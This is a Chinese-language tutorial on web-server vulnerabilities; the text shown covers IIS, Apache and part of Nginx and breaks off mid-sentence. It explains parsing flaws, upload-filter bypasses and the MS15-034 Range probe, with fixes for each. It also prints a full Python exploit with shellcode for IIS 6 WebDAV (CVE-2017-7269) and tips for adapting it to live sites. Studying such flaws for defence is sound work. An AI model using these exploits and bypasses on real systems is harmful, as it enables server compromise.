-
第一章:IIS
-
IIS 6 解析漏洞
-
IIS 7 解析漏洞
-
PUT任意文件写入
-
IIS短文件漏洞
-
HTTP.SYS远程代码执行 (MS15-034)
-
RCE-CVE-2017-7269
-
-
第二章:Apache
-
未知扩展名解析漏洞
-
AddHandler导致的解析漏洞
-
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
-
-
第三章:Nginx
-
Nginx配置文件错误导致的解析漏洞
-
Nginx 空字节任意代码执行漏洞
-
Nginx 文件名逻辑漏洞(CVE-2013-4547)
-
Nginx 配置错误导致的安全问题
-
-
第四章:Tomcat
-
Tomcat 任意文件写入(CVE-2017-12615)
-
Tomcat 远程代码执行(CVE-2019-0232)
-
Tomcat + 弱口令 && 后台getshell漏洞
-
Tomcat manager App 暴力破解
-
-
第五章:JBoss
-
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
-
JBoss JMXInvokerServlet 反序列化漏洞
-
JBoss EJBInvokerServlet 反序列化漏洞
-
JBoss <=4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
-
Administration Console 弱口令
-
JMX Console未授权访问
-
-
第六章:weblogic
-
XMLDecoder 反序列化漏洞(CVE-2017-10271 & CVE-2017-3506)
-
Weblogic wls9_async_response,wls-wsat 反序列化远程代码执行漏洞(CVE-2019-2725)
-
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
-
Weblogic 任意文件上传漏洞(CVE-2018-2894)
-
Weblogic SSRF漏洞 (CVE-2014-4210)
-
Weblogic 弱口令 && 后台getshell
-
-
第七章:GlassFish
-
GlassFish Directory Traversal(CVE-2017-1000028)
-
GlassFish 后台Getshell
-
-
第八章:WebSphere
-
Java反序列化(CVE-2015-7450)
-
弱口令 && 后台Getshell
-
1、IIS
IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。IIS目前只适用于Windows系统,不适用于其他操作系统。
IIS 6 解析漏洞
基于文件名,该版本 默认会将 *.asp;.jpg 此种格式的文件名,当成Asp解析,原理是 服务器默认不解析; 号及其后面的内容,相当于截断。
基于文件夹名,该版本 默认会将 *.asp/目录下的所有文件当成Asp解析。
另外,IIS6.x除了会将扩展名为.asp的文件解析为asp之外,还默认会将扩展名为.asa,.cdx,.cer解析为asp,
从网站属性->主目录->配置 可以看出,他们都是调用了asp.dll进行的解析。
修复建议
由于微软并不认为这是一个漏洞,也没有推出IIS 6.0的补丁,因此漏洞需要自己修复。
1、限制上传目录执行权限,不允许执行脚本。
2、不允许新建目录。
3.、上传的文件需经过重命名(时间戳+随机数+.jpg等)
IIS 7 解析漏洞
1、安装IIS7.5,控制面板 -> 程序 -> 打开或关闭windows功能。
2、下载php-5.2.6-win32-installer.msi
3、打开msi,一直下一步来到选择web server setup的界面,在这里选择IIS fastcgi,之后一直下一步。
4、打开IIS,管理工具 ->Internet 信息服务(IIS)管理器
5、选择编辑ISAPI或者CGI限制
添加安装的php-cgi.exe路径,描述随意。
6、返回第五步的第一个图片位置,点击处理程序映射,添加如下。
7、phpinfo测试
IIS7.x版本 在Fast-CGI运行模式下,在任意文件,例:test.jpg后面加上/.php,会将test.jpg 解析为php文件。
修复建议
配置cgi.fix_pathinfo(php.ini中)为0并重启php-cgi程序
结果如下:
PUT任意文件写入
IIS Server 在 Web 服务扩展中开启了 WebDAV之后,支持多种请求,配合写入权限,可造成任意文件写入。
修复建议
关闭WebDAV 和 写权限
IIS短文件漏洞
Windows 以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位 Windows的程序访问这些文件。在cmd下输入”dir /x”即可看到短文件名的效果。
IIS短文件名产生:
1、当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位。2、当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名。
目前IIS支持短文件名猜测的HTTP方法主要包括:DEBUG、OPTIONS、GET、POST、HEAD、TRACE六种。
IIS 8.0之后的版本只能通过OPTIONS和TRACE方法被猜测成功。
复现:
IIS8.0以下版本需要开启ASP.NET支持,IIS大于等于8.0版本,即使没有安装ASP.NET,通过OPTIONS和TRACE方法也可以猜解成功。
以下通过开启IIS6.0 ASP.NET后进行复现。
当访问构造的某个存在的短文件名,会返回404;
当访问构造的某个不存在的短文件名,会返回400;
IIS短文件漏洞局限性
1) 如果文件名本身太短也是无法猜解的;
2) 此漏洞只能确定前6个字符,如果后面的字符太长、包含特殊字符,很难猜解;
3) 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配;
4) 如果文件夹名前6位字符带点”.”,扫描程序会认为是文件而不是文件夹,最终出现误报;
5) 不支持中文文件名,包括中文文件和中文文件夹。一个中文相当于两个英文字符,故超过4个中文字会产生短文件名,但是IIS不支持中文猜测。
修复建议
1)从CMD命令关闭NTFS 8.3文件格式的支持
Windows Server 2003:(1代表关闭,0代表开启)
关闭该功能:fsutil behavior set disable8dot3 1
Windows Server 2008 R2:
查询是否开启短文件名功能:fsutil 8dot3name query
关闭该功能:fsutil 8dot3name set 1
不同系统关闭命令稍有区别,该功能默认是开启的.
2)或从修改注册表关闭NTFS 8.3文件格式的支持
快捷键Win+R打开命令窗口,输入regedit打开注册表窗口
找到路径:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem,将其中的 NtfsDisable8dot3NameCreation这一项的值设为 1,1代表不创建短文件名格式
以上两种方式修改完成后,均需要重启系统生效。
Note:此方法只能禁止NTFS8.3格式文件名创建,已经存在的文件的短文件名无法移除,需要重新复制才会消失。
例:将web文件夹的内容拷贝到另一个位置,如c:\www到c:\ww,然后删除原文件夹,再重命名c:\ww到c:\www。
HTTP.SYS远程代码执行 (MS15-034)
影响范围:
Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2
复现:
在Windows7上 安装IIS7.5。
1、访问。
2、编辑请求头,增加Range: bytes=0-18446744073709551615字段,若返回码状态为416 Requested Range Not Satisfiable,则存在HTTP.SYS远程代码执行漏洞
漏洞有点鸡肋,配合其他漏洞使用还是可以用用的,具体使用可转至MSF中。
修复建议
安装修复补丁(KB3042553)
RCE-CVE-2017-7269
Microsoft Windows Server 2003 R2中的Internet信息服务(IIS)6.0中的WebDAV服务中的ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以”If:<http://“开头的长标头执行任意代码PROPFIND请求。
影响范围:
在Windows 2003 R2(Microsoft(R) Windows(R) Server 2003, Enterprise Edition Service Pack 2)上使用IIS 6.0并开启WebDAV扩展。
复现:
CVE作者给出的exp 计算机弹弹弹!!!
用python2 运行,结果如下。
任务管理器开启了calc.exe进程,因为计算器是网络服务权限打开的,所以我们在桌面上看不见。
这个漏洞有几个需要注意的地方,如下。
由于作者提供的Exp执行之后就卡在那里了,因此不适合用弹计算机的shellcode进行测试,网上找了个dalao的回显shellcode来测试。
首先将上图中python2 IDE运行时产生的Raw类型的HTTP数据包copy保存至记事本中,然后在Burp Repeater模块 Paste from file。
将shellcode更换成如下:
VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397O00WRJKPSSI7KQR72JPXKOXPP3GP0PPP36VXLKM1VZM0LCKNSOKON2KPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJMPNQ03LMLJPXNM1J13OWNMOS2H352CBKOJO0PCQFOUNMOB00NQNWNMP7OBP6OILMKZLMKZ130V15NMP2P0NQP7NMNWOBNV09KPM0A
结果:
CVE作者给出的Exp是在默认端口,默认域名,默认路径的情况下适用。
第一个需要注意的是端口和域名绑定问题:
当端口改变时,If头信息中的两个url端口要与站点端口一致,如下。
当域名改变时,If头信息中的两个url域名要与站点域名一致,且HOST头也要与站点域名一致。如下
不修改Host将返回502,如下
Note:
测试的时候凡是需要修改IIS配置的操作,修改完毕后都需要重启IIS, 或者在不超过禁用阈值的前提下结束w3wp进程。 |
第二个需要注意的是物理路径问题:
CVE作者提供的Exp是在 默认路径长度等于19(包括结尾的反斜杠)的情况下适用,IIS默认路径一般为:c:\inetpub\wwwroot
解决方法:
当路径长度小于19时需要对padding进行添加。
当路径长度大于19时需要对padding进行删除。
ROP和stackpivot前面的padding实际上为UTF8编码的字符,每三个字节解码后变为两个字节的UTF16字符,在保证Exp不出错的情况下,有0x58个字符是没用的。所以可以将前0x108个字节删除,换成0x58个a或b。
原exp 修改后如下:
# coding:utf-8
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.124.129',8888))
pay='PROPFIND / HTTP/1.1\r\nHost: www.lxhsec.com\r\nContent-Length: 0\r\n'
pay+='If: <http://www.lxhsec.com:8888/aaaaaaa'
pay+='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
pay+='\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://www.lxhsec.com:8888/bbbbbbb'
pay+='bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
pay+='\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397O00WRJKPSSI7KQR72JPXKOXPP3GP0PPP36VXLKM1VZM0LCKNSOKON2KPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJMPNQ03LMLJPXNM1J13OWNMOS2H352CBKOJO0PCQFOUNMOB00NQNWNMP7OBP6OILMKZLMKZ130V15NMP2P0NQP7NMNWOBNV09KPM0A'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close
执行:
当路径长度小于19时,如下,需要增加12个a,b
而实际中路径常常大于19,需要对padding进行删除。
当路径为c:\www\
的时候,a有107个,加起来有114个,除去盘符有111个字符,所以可以把Exp的padding增加至111,并逐次进行减少。当长度不匹配时返回500,成功时返回200,通过爆破方式得到物理路径长度。
成功:
失败:
当然如果能得到物理路径,则用114减去物理路径长度(包括末尾的反斜杠)就是所需的padding长度。
第三个需要注意的是,超时问题。
当exp执行成功一段时间之后(大概十分钟到二十分钟左右,其间无论有无访问),再对这个站点执行exp永远不会成功,同时返回400。
解决方法:
1.等待w3wp重启。
2.测试旁站(因为每个池都是独立的w3wp进程,换一个可能在其他池的旁站进行尝试)
第四个需要注意的是,多次执行错误shellcode
多次执行错误的shellcode会覆盖很多不该覆盖的代码,从而导致正确的shellcode执行时也返回500,
提示信息为:参数不正确,也可能什么都不返回。
解决方法:
1.等待w3wp重启。
2.测试旁站(因为每个池都是独立的w3wp进程,换一个可能在其他池的旁站进行尝试)
修复建议:关闭 WebDAV
2、Apache
Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。
未知扩展名解析漏洞
Apache的解析漏洞依赖于一个特性:Apache默认一个文件可以有多个以点分割的后缀,当最右边的后缀无法识别(不在mime.types文件内),则继续向左识别,直到识别到合法后缀才进行解析。
复现:
这里使用phpstudy进行复现。
下载地址:
http://phpstudy.php.cn/phpstudy/phpStudy(PHP5.2).zip
访问phpinfo.php.xxx
实战中可以上传rar,owf等文件进行利用,如果上传phpinfo.php.jpg,即使文件名中有.php,也会直接解析为jpg。因为Apache认识.jpg,停止继续向左识别。
AddHandler导致的解析漏洞
如果运维人员给.php后缀增加了处理器:
AddHandler application/x-httpd-php .php
那么,在有多个后缀的情况下,只要一个文件名中含有.php后缀,即被识别成PHP文件,没必要是最后一个后缀。
利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。
复现:
即使最右边的文件格式是在mime.types文件内,只要文件名中出现.php,就直接被解析为php。
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
影响范围:2.4.0~2.4.29版本
环境:phpstudy2014 Apache + PHP5.4n
此漏洞形成的根本原因,在于$, 正则表达式中$不仅匹配字符串结尾位置,也可以匹配\n 或 \r
在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
<FilesMatch \.php$>
SetHandler application/x-httpd-php
</FilesMatch>
测试代码:
<html>
<body>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="text" name="name" />
<input type="submit" value="上传文件" />
</form>
</body>
</html>
<?php
if(isset($_FILES['file'])) {
$name = basename($_POST['name']);
$ext = pathinfo($name,PATHINFO_EXTENSION);
if(in_array($ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {
exit('bad file');
}
echo "ok";
move_uploaded_file($_FILES['file']['tmp_name'], './' . $name);
}
?>
点击Go后,效果如下:
相同代码在Linux下进行测试,可以正常写入。
访问:
限制:获取文件名时不能用$_FILES[‘file’][‘name’],因为它会自动把换行去掉。
修复建议
1、升级到最新版本
2、或将上传的文件重命名为为时间戳+随机数+.jpg的格式并禁用上传文件目录执行脚本权限。
3、Nginx
Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好。
Nginx配置文件错误导致的解析漏洞
对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。
例:info.jpg后面加上/xxx.php,会将info.jpg 以php解析。
这里使用phpstudy2014 ,Nginx + PHP5.3n进行复现(以下复现若无特别说明均采用此环境)
结果:
该漏洞是Nginx配置所导致,与Nginx版本无关,下面是常见的漏洞配置。
server {
location ~ \.php$ {
root /work/www/test;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME
$document_root$fastcgi_script_name;
include fastcgi_params;
fastcgi_pass unix:/tmp/php-fpm.sock;
}
}
当攻击者访问/info.jpg/xxx.php时, Nginx将查看URL,看到它以.php结尾,并将路径传递给PHP fastcgi处理程序。
Nginx传给php的路径为c:/WWW/info.jpg/xxx.php
,
在phpinfo中可以查看_SERVER["ORIG_SCRIPT_FILENAME"]
得到。
PHP根据URL映射,在服务器上寻找xxx.php文件,但是xxx.php不存在,又由于cgi.fix_pathinfo默认是开启的,因此PHP 会继续检查路径中存在的文件,并将多余的部分当作 PATH_INFO。接着PHP在文件系统中找到.jpg文件,而后以PHP的形式执行.jpg的内容,并将/xxx.php存储在 PATH_INFO 后丢弃,因此我们在phpinfo中的$_SERVER['PATH_INFO']
看的到值为空。
Note:php的一个选项:cgi.fix_pathinfo,该选项默认开启,值为1,用于修理路径,
例如:当php遇到文件路径”/info.jpg/xxx.php/lxh.sec”时,若”/info.jpg/xxx.php/lxh.sec”不存在,则会去掉最后的”/lxh.sec”,然后判断”/info.jpg/xxx.php”是否存在, 若存在则将/info.jpg/xxx.php当作文件/info.jpg/xxx.php/lxh.sec,若/info.jpg/xxx.php仍不存在,则继续去掉xxx.php,依此类推。
修复建议
1、配置cgi.fix_pathinfo(php.ini中)为0并重启php-cgi程序
结果:
2、或如果需要使用到cgi.fix_pathinfo这个特性(例如:Wordpress),那么可以禁止上传目录的执行脚本权限。
或将上传存储的内容与网站分离,即站库分离。
3、或高版本PHP提供了security.limit_extensions这个配置参数,设置security.limit_e